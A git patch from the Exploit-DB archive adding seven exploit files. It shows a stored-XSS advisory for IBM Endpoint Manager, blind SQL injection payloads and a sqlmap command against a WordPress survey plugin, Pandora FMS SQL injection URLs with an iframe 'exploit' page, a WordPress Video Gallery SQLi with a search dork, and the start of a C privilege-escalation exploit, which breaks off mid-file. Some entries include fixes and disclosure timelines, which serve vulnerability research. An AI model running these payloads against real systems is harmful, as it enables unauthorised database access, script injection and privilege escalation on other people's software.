From 06f9de32a22ac31d85cdcfd5a12f5ec1ac0c90a2 Mon Sep 17 00:00:00 2001
From: Offensive Security <info@exploit-db.com>
Date: Fri, 13 Feb 2015 08:36:33 +0000
Subject: [PATCH] Update: 2015-02-13

7 new exploits
---
 files.csv                         |   7 +
 platforms/cgi/webapps/36057.txt   | 150 +++++++++++++++
 platforms/php/webapps/36054.txt   | 139 ++++++++++++++
 platforms/php/webapps/36055.txt   | 229 ++++++++++++++++++++++
 platforms/php/webapps/36058.txt   |  68 +++++++
 platforms/windows/local/36052.c   | 302 ++++++++++++++++++++++++++++++
 platforms/windows/local/36053.py  |  40 ++++
 platforms/windows/remote/36056.rb | 131 +++++++++++++
 8 files changed, 1066 insertions(+)
 create mode 100755 platforms/cgi/webapps/36057.txt
 create mode 100755 platforms/php/webapps/36054.txt
 create mode 100755 platforms/php/webapps/36055.txt
 create mode 100755 platforms/php/webapps/36058.txt
 create mode 100755 platforms/windows/local/36052.c
 create mode 100755 platforms/windows/local/36053.py
 create mode 100755 platforms/windows/remote/36056.rb

diff --git a/files.csv b/files.csv
index 34a4385e8..eded41140 100755
--- a/files.csv
+++ b/files.csv
@@ -32492,3 +32492,10 @@ id,file,description,date,author,platform,type,port
 36049,platforms/windows/remote/36049.html,"StudioLine Photo Basic 3.70.34.0 'NMSDVDXU.dll' ActiveX Control Arbitrary File Overwrite Vulnerability",2011-08-17,"High-Tech Bridge SA",windows,remote,0
 36050,platforms/php/webapps/36050.txt,"WordPress Fast Secure Contact Form 3.0.3.1 'index.php' Cross Site Scripting Vulnerability",2011-08-17,"High-Tech Bridge SA",php,webapps,0
 36051,platforms/php/webapps/36051.txt,"WordPress WP-Stats-Dashboard Plugin 2.6.5.1 Multiple Cross Site Scripting Vulnerabilities",2011-08-17,"High-Tech Bridge SA",php,webapps,0
+36052,platforms/windows/local/36052.c,"SoftSphere DefenseWall FW/IPS 3.24 - Privilege Escalation",2015-02-11,"Parvez Anwar",windows,local,0
+36053,platforms/windows/local/36053.py,"MooPlayer 1.3.0 'm3u' SEH Buffer Overflow",2015-02-11,"dogo h@ck",windows,local,0
+36054,platforms/php/webapps/36054.txt,"Wordpress Survey and Poll Plugin 1.1 - Blind SQL Injection",2015-02-11,"Securely (Yoo Hee man)",php,webapps,80
+36055,platforms/php/webapps/36055.txt,"Pandora FMS 5.1 SP1 - SQL Injection Vulnerability",2015-02-11,Vulnerability-Lab,php,webapps,8080
+36056,platforms/windows/remote/36056.rb,"Achat v0.150 beta7 Buffer Overflow",2015-02-11,metasploit,windows,remote,9256
+36057,platforms/cgi/webapps/36057.txt,"IBM Endpoint Manager - Stored XSS Vulnerability",2015-02-11,"RedTeam Pentesting",cgi,webapps,52311
+36058,platforms/php/webapps/36058.txt,"Wordpress Video Gallery 2.7.0 - SQL Injection Vulnerability",2015-02-12,"Claudio Viviani",php,webapps,0
diff --git a/platforms/cgi/webapps/36057.txt b/platforms/cgi/webapps/36057.txt
new file mode 100755
index 000000000..63b36ec13
--- /dev/null
+++ b/platforms/cgi/webapps/36057.txt
@@ -0,0 +1,150 @@
+Advisory: Cross-Site Scripting in IBM Endpoint Manager Relay Diagnostics
+          Page
+
+During a penetration test, RedTeam Pentesting discovered that the IBM
+Endpoint Manager Relay Diagnostics page allows anybody to persistently
+store HTML and JavaScript code that is executed when the page is opened
+in a browser.
+
+
+Details
+=======
+
+Product: IBM Endpoint Manager
+Affected Versions:  9.1.x versions earlier than 9.1.1229,
+                    9.2.x versions earlier than 9.2.1.48
+Fixed Versions: 9.1.1229, 9.2.1.48
+Vulnerability Type: Cross-Site Scripting
+Security Risk: medium
+Vendor URL: http://www-03.ibm.com/software/products/en/endpoint-manager-family
+Vendor Status: fixed version released
+Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2014-013
+Advisory Status: published
+CVE:  CVE-2014-6137
+CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6137
+
+
+Introduction
+============
+
+IBM Endpoint Manager products - built on IBM BigFix technology - can
+help you achieve smarter, faster endpoint management and security. These
+products enable you to see and manage physical and virtual endpoints
+including servers, desktops, notebooks, smartphones, tablets and
+specialized equipment such as point-of-sale devices, ATMs and
+self-service kiosks. Now you can rapidly remediate, protect and report
+on endpoints in near real time.
+
+(from the vendor's homepage)
+
+
+More Details
+============
+
+Systems that run IBM Endpoint Manager (IEM, formerly Tivoli Endpoint
+Manager, or TEM) components, such as TEM Root Servers or TEM Relays,
+typically serve HTTP and HTTPS on port 52311. There, the server or relay
+diagnostics page is normally accessible at the path /rd. That page can
+be accessed without authentication and lets users query and modify
+different information. For example, a TEM Relay can be instructed to
+gather a specific version of a certain Fixlet site by requesting a URL
+such as the following:
+
+http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
+  BESGatherMirrorNew.exe/-gatherversion
+  ?Body=GatherSpecifiedVersion
+  &url=http://tem-root.example.com:52311/cgi-bin/bfgather.exe/actionsite
+  &version=1
+  &useCRC=0
+
+The URL parameter url is susceptible to cross-site scripting. When the
+following URL is requested, the browser executes the JavaScript code
+provided in the parameter:
+
+http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
+  BESGatherMirrorNew.exe/-gatherversion
+  ?Body=GatherSpecifiedVersion
+  &version=1
+  &url=http://"><script>alert(/XSS/)</script>
+  &version=1
+  &useCRC=0
+
+The value of that parameter is also stored in the TEM Relay's site list,
+so that the embedded JavaScript code is executed whenever the
+diagnostics page is opened in a browser:
+
+$ curl http://tem-relay.example.com:52311/rd
+[...]
+
+<select NAME="url">
+[...]
+    <option>http://"><script>alert(/XSS/)</script></option>
+</select>
+
+
+Proof of Concept
+================
+
+http://tem-relay.example.com:52311/cgi-bin/bfenterprise/
+  BESGatherMirrorNew.exe/-gatherversion
+  ?Body=GatherSpecifiedVersion&version=1
+  &url=http://"><script>alert(/XSS/)</script>
+  &version=1
+  &useCRC=0
+
+
+Fix
+===
+
+Upgrade IBM Endpoint Manager to version 9.1.1229 or 9.2.1.48.
+
+
+Security Risk
+=============
+
+As the relay diagnostics page is typically not frequented by
+administrators and does not normally require authentication, it is
+unlikely that the vulnerability can be exploited to automatically and
+reliably attack administrative users and obtain their credentials.
+
+Nevertheless, the ability to host arbitrary HTML and JavaScript code on
+the relay diagnostics page, i.e. on a trusted system, may allow
+attackers to conduct very convincing phishing attacks.
+
+This vulnerability is therefore rated as a medium risk.
+
+
+Timeline
+========
+
+2014-07-29 Vulnerability identified during a penetration test
+2014-08-06 Customer approves disclosure to vendor
+2014-09-03 Vendor notified
+2015-01-13 Vendor releases security bulletin and software upgrade
+2015-02-04 Customer approves public disclosure
+2015-02-10 Advisory released
+
+
+RedTeam Pentesting GmbH
+=======================
+
+RedTeam Pentesting offers individual penetration tests, short pentests,
+performed by a team of specialised IT-security experts. Hereby, security
+weaknesses in company networks or products are uncovered and can be
+fixed immediately.
+
+As there are only few experts in this field, RedTeam Pentesting wants to
+share its knowledge and enhance the public knowledge with research in
+security-related areas. The results are made available as public
+security advisories.
+
+More information about RedTeam Pentesting can be found at
+https://www.redteam-pentesting.de.
+
+
+-- 
+RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
+Dennewartstr. 25-27                       Fax : +49 241 510081-99
+52068 Aachen                    https://www.redteam-pentesting.de
+Germany                         Registergericht: Aachen HRB 14004
+Geschäftsführer:                       Patrick Hof, Jens Liebchen
\ No newline at end of file
diff --git a/platforms/php/webapps/36054.txt b/platforms/php/webapps/36054.txt
new file mode 100755
index 000000000..503d5f485
--- /dev/null
+++ b/platforms/php/webapps/36054.txt
@@ -0,0 +1,139 @@
+?#################################################################
+# Exploit Title : Wordpress Survey and poll Blind SQL Injection
+
+# Data : 2015 – 02 - 11
+
+# Exploit Author : Securely (Yoo Hee man)
+
+# Plugin : WordPress Survey and Poll
+
+# Vender Homepage : http://modalsurvey.sympies.com
+
+# Tested On : Windows XP / sqlmap_v1.0
+
+# Software Link : https://downloads.wordpress.org/plugin/wp-survey-and-poll.1.1.zip
+                  https://downlaods.wordpress.org/plugin/wp-survey-and-poll.zip (latest version v.1.1.7 By February 11, 2015 based on)
+
+1. Detail 
+- This Plugin is passes ajax_survey function as [admin-ajax.php] a form of action and processes them in the /wp-survey-and-poll/settings.php
+- Settings.php file is no login cookie check
+- "survey_id" variable is not sanitized
+
+
+#################################################################
+public function ajax_survey()
+    {
+		global $wpdb;
+		$survey_id = "";
+		$survey_name = "";
+		$survey_start_time = "";
+		$survey_expiry_time = "";
+		$survey_global = "";
+		if (isset($_REQUEST['survey_id'])) $survey_id = sanitize_text_field($_REQUEST['survey_id']);
+		else $survey_id = "";
+		if (isset($_REQUEST['survey_name'])) sanitize_text_field($survey_name = $_REQUEST['survey_name']);
+		else $survey_name = "";
+		if (isset($_REQUEST['start_time'])&&(!empty($_REQUEST['start_time']))) $survey_start_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['start_time']));
+		else $survey_start_time = "";
+		if (isset($_REQUEST['expiry_time'])&&(!empty($_REQUEST['expiry_time']))) $survey_expiry_time = $this->get_datetime_date(sanitize_text_field($_REQUEST['expiry_time']));
+		else $survey_expiry_time = "";
+		if (isset($_REQUEST['global_use'])) $survey_global = sanitize_text_field($_REQUEST['global_use']);
+		else $survey_global = "";
+		if (isset($_REQUEST['options'])) $survey_options = sanitize_text_field($_REQUEST['options']);
+		else $survey_options = "";
+		if (isset($_REQUEST['qa'])) $survey_qa = sanitize_text_field($_REQUEST['qa']);
+		else $survey_qa = "";
+		$survey_check = $wpdb->get_var("SELECT COUNT(*) FROM ".$wpdb->prefix."wp_sap_surveys WHERE `id` = ".$survey_id);
+		if ($_REQUEST['sspcmd']=="save")
+		{
+		if ($survey_check>0) {
+		//update survey
+			$wpdb->update( $wpdb->prefix."wp_sap_surveys", array( "options" => $survey_options, "start_time" => $survey_start_time, 'expiry_time' => $survey_expiry_time, 'global' => $survey_global),array('id' => $survey_id));
+			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_questions WHERE `survey_id` = %d",$survey_id));
+			$wpdb->query($wpdb->prepare("DELETE FROM ".$wpdb->prefix."wp_sap_answers WHERE `survey_id` = %d",$survey_id));
+				$qa_object = (array)json_decode(stripslashes($survey_qa));
+				$qa_array = (array)$qa_object;
+				foreach($qa_array as $keyq=>$qr)
+				{
+					foreach($qr as $key=>$oa)
+					{
+						if ($key==0)
+						{
+						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
+							'id' => ($keyq+1), 
+							'survey_id' => $survey_id, 
+							'question' => $oa
+							) );
+							$qid = $wpdb->insert_id;
+						}
+						else
+						{
+						$oans = explode("->",$oa);
+						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
+							'survey_id' => $survey_id, 
+							'question_id' => ($keyq+1),
+							'answer' => $oans[0],
+							'count' => $oans[1],
+							'autoid' => $key
+							) );					
+						}
+					
+					}
+				}
+			die("updated");
+		}
+		else {
+		//insert survey
+			$wpdb->insert( $wpdb->prefix."wp_sap_surveys", array( 
+				'id' => $survey_id, 
+				'name' => $survey_name, 
+				'options' => $survey_options, 
+				'start_time' => $survey_start_time,
+				'expiry_time'=> $survey_expiry_time,
+				'global'=> $survey_global
+				) );
+				$qa_object = (array)json_decode(stripslashes($survey_qa));
+				$qa_array = (array)$qa_object;
+				foreach($qa_array as $keyq=>$qr)
+				{
+					foreach($qr as $key=>$oa)
+					{
+						if ($key==0)
+						{
+						$wpdb->insert( $wpdb->prefix."wp_sap_questions", array( 
+							'id' => ($keyq+1), 
+							'survey_id' => $survey_id, 
+							'question' => $oa
+							) );
+							$qid = $wpdb->insert_id;
+						}
+						else
+						{
+						$oans = explode("->",$oa);
+						$wpdb->insert( $wpdb->prefix."wp_sap_answers", array( 
+							'survey_id' => $survey_id, 
+							'question_id' => ($keyq+1),
+							'answer' => $oans[0],
+							'autoid' => $key
+							) );					
+						}
+					
+					}
+				}
+			die('success');
+		}
+################################################################
+
+2. POC
+- http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498 [SQLi]
+- DataBase() => "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id= 3556498 AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),3,1))>[Numbers compare]
+
+3. Sqlmap
+- sqlmap -u "http://[target]/wp-admin/admin-ajax.php?action=ajax_survey&sspcmd=save&survey_id=3556498" -p survey_id --dbms=mysql
+
+
+3. Solution:
+Not patched
+
+4. Discovered By : Securely(Yoo Hee man)
+                   god2zuzu@naver.com
\ No newline at end of file
diff --git a/platforms/php/webapps/36055.txt b/platforms/php/webapps/36055.txt
new file mode 100755
index 000000000..0ebba36f4
--- /dev/null
+++ b/platforms/php/webapps/36055.txt
@@ -0,0 +1,229 @@
+Document Title:
+===============
+Pandora FMS v5.1 SP1 - SQL Injection Web Vulnerability
+
+
+References (Source):
+====================
+http://vulnerability-lab.com/get_content.php?id=1355
+
+
+Release Date:
+=============
+2015-02-09
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+1355
+
+
+Common Vulnerability Scoring System:
+====================================
+6.3
+
+
+Product & Service Introduction:
+===============================
+Pandora FMS is a monitoring Open Source software. It watches your systems and applications, and allows you to 
+know the status of any element of those systems. Pandora FMS could detect a network interface down, a defacement 
+in your website, a memory leak in one of your server application, or the movement of any value of the NASDAQ 
+new technology market. 
+
+    * Detect new systems in network.
+    * Checks for availability or performance.
+    * Raise alerts when something goes wrong.
+    * Allow to get data inside systems with its own lite agents (for almost every Operating System).
+    * Allow to get data from outside, using only network probes. Including SNMP.
+
+
+    * Get SNMP Traps from generic network devices. 
+    * Generate real time reports and graphics.
+    * SLA reporting.
+    * User defined graphical views.
+    * Store data for months, ready to be used on reporting.
+    * Real time graphs for every module. 
+    * High availability for each component.
+    * Scalable and modular architecture.
+    * Supports up to 2500 modules per server.
+    * User defined alerts. Also could be used to react on incidents.
+    * Integrated incident manager.
+    * Integrated DB management: purge and DB compaction. 
+    * Multiuser, multi profile, multi group.
+    * Event system with user validation for operation in teams.
+    * Granularity of accesses and user profiles for each group and each user.
+    * Profiles could be personalized using up to eight security attributes without limitation on groups or profiles. 
+
+Pandora FMS runs on any operating system, with specific agents for each platform, gathering data and sending it to a 
+server, it has specific agents for GNU/Linux, AIX, Solaris, HP-UX, BSD/IPSO, and Windows 2000, XP and 2003.
+
+(Copy of the Vendor Homepage: http://pandorafms.org/index.php?sec=project&sec2=home&lang=en)
+
+
+Abstract Advisory Information:
+==============================
+The Vulnerability Laboratory Research Team discovered a SQL Injection web vulnerability in the official Pandora FMS monitoring web-application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2015-02-09:	Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Artica Sulociones Tecnologicas
+Product: Pandora FMS - Monitoring Web Application 5.1 SP1
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+High
+
+
+Technical Details & Description:
+================================
+A remote sql injection web vulnerability has been discovered in the official Pandora FMS v5.1 SP1 monitoring web-application.
+The vulnerability allows remote attackers and low privileged application user accounts to unauthorized execute sql commands 
+that compromise the affected monitoring web-application and dbms.
+
+The vulnerability is located in the offset value of the index list context module. Remote attackers and low privileged application 
+user accounts are able to execute own sql commands via GET method request. The attacker can prepare a request through the `agentes` 
+module to inject own sql commands on the affected web-application dbms.
+
+The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 6.3.
+Exploitation of the remote sql injection web vulnerability requires no user interaction and a low privileged web-application user account.
+Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise.
+
+Request Method(s):
+				[+] GET
+
+Vulnerable Module(s):
+				[+] agentes
+				[+] agents_modules
+
+Vulnerable Parameter(s):
+				[+] offset
+
+
+Proof of Concept (PoC):
+=======================
+The sql injection web vulnerabilities can be exploited by local low privileged application user accounts in godmode without user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+PoC:
+http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
+http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
+http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60
+http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'--
+http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'--
+http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'--
+http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'--
+
+
+--- SQL Error Session Logs ---
+SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 1 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
+-
+SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY nombre' at line 28 ('SELECT id_agente_modulo,nombre FROM tagente_modulo WHERE ( 1 = ( SELECT is_admin FROM tusuario WHERE id_user = 'webuser' ) OR tagente_modulo.id_agente IN ( SELECT id_agente FROM tagente WHERE id_grupo IN ( 13 ) ) OR 0 IN ( SELECT id_grupo FROM tusuario_perfil WHERE id_usuario = 'webuser' AND id_perfil IN ( SELECT id_perfil FROM tperfil WHERE agent_view = 1 ) ) ) AND id_agente IN (-1') AND delete_pending = 0 AND delete_pending = "0" ORDER BY nombre') in /var/www/html/pandora/include/db/mysql.php
+-
+SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
+-
+SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '-1, 20' at line 3 ('SELECT id_agente,id_grupo,id_os,ultimo_contacto,intervalo,comentarios description,quiet,normal_count,warning_count,critical_count,unknown_count,notinit_count,total_count,fired_count FROM tagente WHERE `id_grupo` IN ("13") AND `disabled` = 0 AND 1 = 1 AND ( 1 = 1) ORDER BY nombre COLLATE utf8_general_ci ASC, nombre COLLATE utf8_general_ci LIMIT -1, 20 ') in /var/www/html/pandora/include/db/mysql.php on line 74
+-
+SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY utimestamp DESC LIMIT 10' at line 4 ('SELECT * FROM tevento WHERE id_agente = -1' AND estado <> 1 ORDER BY utimestamp DESC LIMIT 10') in /var/www/html/pandora/include/db/mysql.php on line 74
+-
+SQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1 ('SELECT notinit_count FROM tagente WHERE id_agente = -1'') in /var/www/html/pandora/include/db/mysql.php
+
+
+PoC: Exploit (html & js)
+
+<html>
+<head><body>
+<title>Pandora FMS - SQL Injection Exploit</title>
+<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&refr=60&group_id=0&search=&sort_field=&sort=none&status=0&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
+<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=2592000&refresh=Refresh%20path&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
+<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/estado_agente&group_id=0&search=&sort_field=&sort=none&status=-1&offset=-[SQL INJECTION VULNERABILITY!]'--&refr=60>
+<iframe src=http://fms.localhost:8080/pandora/index.php?&sec=estado&sec2=operation/agentes/ver_agente&tab=gis&id_agente=349&refr=&period=-[SQL INJECTION VULNERABILITY!]'--&refresh=&offset=-[SQL INJECTION VULNERABILITY!]'-->
+<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=4-1%27-[SQL INJECTION VULNERABILITY!]'-->
+<iframe src=http://fms.localhost:8080/pandora/index.php?sec=estado&sec2=operation/agentes/ver_agente&id_agente=-1%27-[SQL INJECTION VULNERABILITY!]'-->
+<iframe src=http://fms.localhost:8080/pandora/index.php?extension_in_menu=estado&sec=extensions&sec2=extensions/agents_modules&refr=&offset=-1%27-[SQL INJECTION VULNERABILITY!]'-->
+</head></body>
+</html>
+
+... or
+
+<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%0A%3Ctitle%3EPandora%20FMS%20-%20SQL%20Injection%20Exploit%3C/title%3E%0A%3Ciframe%20src%3D
+http%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26refr%3D60%26group_id%3D0%26search%3D%26sort_field%3D
+%26sort%3Dnone%26status%3D0%26offset%3D-1%2527-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
+sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D2592000%26refresh%3DRefresh%2520path%26offset%3D-1%2527-%5B
+SQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3Fsec%3Destado%26sec2%3Doperation/agentes/estado_agente%26
+group_id%3D0%26search%3D%26sort_field%3D%26sort%3Dnone%26status%3D-1%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%26refr%3D60%3E%0A%3Ciframe%20src%3Dhttp%3A
+//fms.localhost%3A8080/pandora/index.php%3F%26sec%3Destado%26sec2%3Doperation/agentes/ver_agente%26tab%3Dgis%26id_agente%3D349%26refr%3D%26period%3D-%5BSQL%20INJECTION%20
+VULNERABILITY%21%5D%27--%26refresh%3D%26offset%3D-%5BSQL%20INJECTION%20VULNERABILITY%21%5D%27--%3E%0A%3Ciframe%20src%3Dhttp%3A//fms.localhost%3A8080/pandora/index.php%3F
+sec%3Destado%26sec2%3Doperation/agentes
+
+
+Reference(s):
+http://fms.localhost:8080/pandora/index.php
+http://fms.localhost:8080/pandora/include/db/mysql.php
+
+
+Solution - Fix & Patch:
+=======================
+The issue can be patched by implementation of a prepared statement thats prevents the execution of sql commands through the weak values.
+Encode and parse the vulnerable `offset` value in  all the marked moduzles to prevent further executions or information disclosure.
+
+
+Security Risk:
+==============
+The security risk of the remote sql injection vulnerabilitiy in the pandora fms application is estimated as high. (CVSS 6.3)
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
+or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
+in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
+or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
+consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
+policies, deface websites, hack into databases or trade with fraud/stolen material.
+
+Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
+Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
+Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
+Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
+Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
+Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/
+
+Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
+electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
+is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
+(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
+
+				Copyright © 2015 | Vulnerability Laboratory - Evolution Security GmbH ™
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+CONTACT: research@vulnerability-lab.com
+PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
+
+
diff --git a/platforms/php/webapps/36058.txt b/platforms/php/webapps/36058.txt
new file mode 100755
index 000000000..fad288d1d
--- /dev/null
+++ b/platforms/php/webapps/36058.txt
@@ -0,0 +1,68 @@
+?######################
+
+# Exploit Title : Wordpress Video Gallery 2.7 SQL Injection Vulnerabilitiey
+
+# Exploit Author : Claudio Viviani
+
+# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery
+
+# Software Link : https://downloads.wordpress.org/plugin/contus-video-gallery.2.7.zip
+
+# Dork Google: inurl:/wp-admin/admin-ajax.php?action=rss
+            
+
+# Date : 2015-02-11
+
+# Tested on : Windows 7 / Mozilla Firefox
+              Linux / Mozilla Firefox         
+
+######################
+
+# Vulnerability Disclosure Timeline:
+
+2015-02-08:  Discovered vulnerability
+2015-02-09:  Vendor Notification
+2015-02-10:  Vendor Response/Feedback 
+2015-02-10:  Vendor Send Fix/Patch 
+2015-02-11:  Public Disclosure 
+
+# Description
+
+Wordpress Video Gallery 2.7 suffers from SQL injection
+
+
+######################
+
+# PoC
+
+http://target/wp-admin/admin-ajax.php?action=rss&type=video&vid=[SQLi]
+
+
+#####################
+
+# Fix/patch sended by apptha's developer
+
+File: videogalleryrss.php
+
+Change line n.47 
+
+from:
+
+		$vid             = filter_input(INPUT_GET,'vid');
+to:
+
+		$vid             = intval(filter_input(INPUT_GET,'vid'));
+
+#####################
+
+Discovered By : Claudio Viviani
+        	http://www.homelab.it
+        	info@homelab.it
+        	homelabit@protonmail.ch
+
+        	https://www.facebook.com/homelabit
+        	https://twitter.com/homelabit
+        	https://plus.google.com/+HomelabIt1/
+		https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################
\ No newline at end of file
diff --git a/platforms/windows/local/36052.c b/platforms/windows/local/36052.c
new file mode 100755
index 000000000..f093dc58f
--- /dev/null
+++ b/platforms/windows/local/36052.c
@@ -0,0 +1,302 @@
+?/*
+
+Exploit Title    - SoftSphere DefenseWall FW/IPS Arbitrary Write Privilege Escalation
+Date             - 10th February 2015
+Discovered by    - Parvez Anwar (@parvezghh)
+Vendor Homepage  - http://www.softsphere.com
+Tested Version   - 3.24
+Driver Version   - 3.2.3.0 - dwall.sys
+Tested on OS     - 32bit Windows XP SP3 
+OSVDB            - http://www.osvdb.org/show/osvdb/117996
+CVE ID           - CVE-2015-1515
+Vendor fix url   - 
+Fixed Version    - no fix
+Fixed driver ver - 
+
+*/
+
+
+#include <stdio.h>
+#include <windows.h>
+
+#define BUFSIZE 4096
+
+
+typedef struct _SYSTEM_MODULE_INFORMATION_ENTRY {
+     HANDLE  Section;
+     PVOID   MappedBase;
+     PVOID   Base;
+     ULONG   Size;
+     ULONG   Flags;
+     USHORT  Index;
+     USHORT  NameLength;
+     USHORT  LoadCount;
+     USHORT  PathLength;
+     CHAR    ImageName[256];
+} SYSTEM_MODULE_INFORMATION_ENTRY, *PSYSTEM_MODULE_INFORMATION_ENTRY;
+ 
+typedef struct _SYSTEM_MODULE_INFORMATION {
+     ULONG   Count;
+     SYSTEM_MODULE_INFORMATION_ENTRY Module[1];
+} SYSTEM_MODULE_INFORMATION, *PSYSTEM_MODULE_INFORMATION;
+
+typedef enum _SYSTEM_INFORMATION_CLASS { 
+     SystemModuleInformation = 11,
+     SystemHandleInformation = 16
